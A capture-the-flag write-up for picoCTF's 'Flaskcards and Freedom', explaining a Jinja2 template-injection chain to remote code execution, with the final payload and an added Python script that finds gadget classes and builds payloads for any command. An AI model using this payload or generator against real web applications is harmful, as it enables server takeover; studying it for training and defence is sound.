Flaskcards and Freedom - Web

The hints for this challenge point at remote code execution (RCE), and the way to get it is server-side template injection (SSTI): the app renders our input as a Jinja2 template, so anything we wrap in {{ ... }} is evaluated by Python on the server. Flask exposes its g object to templates, and that single object is enough to walk back to the os module.

First we run (each of the following expressions is submitted inside {{ ... }}):

g.__class__

This returns the class of Flask's g object (the angle-bracket repr of the class was stripped from this page's output).

Then we do:

g.__class__.__mro__

This returns a tuple of classes in Method Resolution Order (that is what mro stands for): the class itself first, then the classes it inherits from, always ending with <class 'object'>. Here the tuple has exactly two entries, the g class and object.

We need the second entry, index [1], which is <class 'object'>. After that we do:

g.__class__.__mro__[1].__subclasses__()

which returns a list of every class that directly inherits from <class 'object'> in the running interpreter. This is the interesting step: the list contains classes from every module the server has imported, not just the app's own code.

Then we pick one of them, for example index 14. It is just an ordinary class; most classes that are implemented in Python (rather than in C) would work equally well, because their __init__ is a Python function and carries the defining module's globals. The index is not stable between interpreter versions and import orders, so on a different target you enumerate the list and pick whichever index holds a suitable class. Running:

g.__class__.__mro__[1].__subclasses__()[14]

returns the class object at that index.

Then we run:

g.__class__.__mro__[1].__subclasses__()[14].__init__

which returns that class's constructor function; in this case it creates a new tarfile object, so the class comes from the tarfile module.

After that, we run this command:

g.__class__.__mro__[1].__subclasses__()[14].__init__.__globals__

which returns a dict of all module-level globals of the module in which __init__ was defined, i.e. everything the tarfile module has imported or defined: {'TarFile': ..., 'open': ..., ...}

Among those globals is the sys module (tarfile imports it). We do not need os to be imported by tarfile itself: sys.modules is the dict of every module the interpreter has loaded, and os is always in there. Once we have os, we can use popen to run a shell command and read to collect its output. The final command looks like this:

{{ g.__class__.__mro__[1].__subclasses__()[14].__init__.__globals__['sys'].modules['os'].popen("cat flag").read() }}

This gives us the flag: picoCTF{R_C_E_wont_let_me_be_04eedee8}
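The same gadget chain written out in plain Python, as an added example that is not part of the original writeup. It uses a stand-in class for Flask's g (so g.__class__.__mro__[1] is object exactly as on the page), imports tarfile so a tarfile class is present in object.__subclasses__(), and shows why a hard-coded index such as 14 is fragile: find_gadget and find_gadget_by_name are hypothetical helpers that locate a usable class by its properties instead, and build_payload emits the writeup's {{ ... }} expression for whatever index was found.

```python
import os       # used only to confirm that the chain reaches the real os module
import sys
import tarfile  # assumption: imported so a tarfile class shows up in object.__subclasses__(), as on the page


class FakeAppGlobals:
    """Stand-in for Flask's g object: a plain class whose only base is object,
    so its __mro__ is (FakeAppGlobals, object), the two-entry tuple seen in the writeup."""


def root_class(obj):
    """Steps 1-2 of the writeup: obj.__class__.__mro__ and pick <class 'object'>.
    The page uses __mro__[1]; __mro__[-1] is the same class here and also works for deeper hierarchies."""
    mro = obj.__class__.__mro__
    assert mro[-1] is object
    return mro[-1]


def find_gadget(obj, needed=("sys",)):
    """Steps 3-5: scan object.__subclasses__() for a class written in Python (its __init__ has a
    __globals__ dict) whose module globals expose every name in `needed` and whose 'sys' looks like
    the real sys module. Returns (index, class). The index differs per environment, which is why
    the hard-coded 14 from the writeup only works on the challenge box."""
    for idx, cls in enumerate(root_class(obj).__subclasses__()):
        init = getattr(cls, "__init__", None)
        g = getattr(init, "__globals__", None)
        if g is None:                       # C-implemented __init__ carries no __globals__
            continue
        if all(name in g for name in needed) and hasattr(g["sys"], "modules"):
            return idx, cls
    raise LookupError("no class with the required globals found")


def find_gadget_by_name(obj, module_name="tarfile"):
    """Alternative to a fixed index: pick the first direct subclass of object defined in a given module."""
    for idx, cls in enumerate(root_class(obj).__subclasses__()):
        if getattr(cls, "__module__", None) == module_name:
            return idx, cls
    raise LookupError("no subclass of object from module %s" % module_name)


def build_payload(idx, cmd):
    """The final Jinja2 expression from the writeup, with the index and command filled in."""
    return (
        "{{ g.__class__.__mro__[1].__subclasses__()[%d]"
        ".__init__.__globals__['sys'].modules['os'].popen(%r).read() }}" % (idx, cmd)
    )


def run_through_gadget(obj, cmd):
    """Evaluate the attribute chain in plain Python, which is exactly what Jinja2 does when the
    payload renders: __globals__['sys'] -> sys.modules['os'] -> os.popen(cmd).read()."""
    idx, cls = find_gadget(obj)
    os_module = cls.__init__.__globals__["sys"].modules["os"]
    assert os_module is os                  # the chain lands on the real os module
    return os_module.popen(cmd).read()


if __name__ == "__main__":
    g = FakeAppGlobals()
    idx, cls = find_gadget_by_name(g)
    print("first tarfile class sits at index %d: %s" % (idx, cls.__name__))
    print(build_payload(idx, "cat flag"))
    print(run_through_gadget(g, "echo RCE works").strip())
```

The only part of this that is specific to Jinja2 is the {{ ... }} wrapper; everything between the braces is ordinary Python attribute access, which is why the chain can be prototyped and debugged locally before sending it to the target.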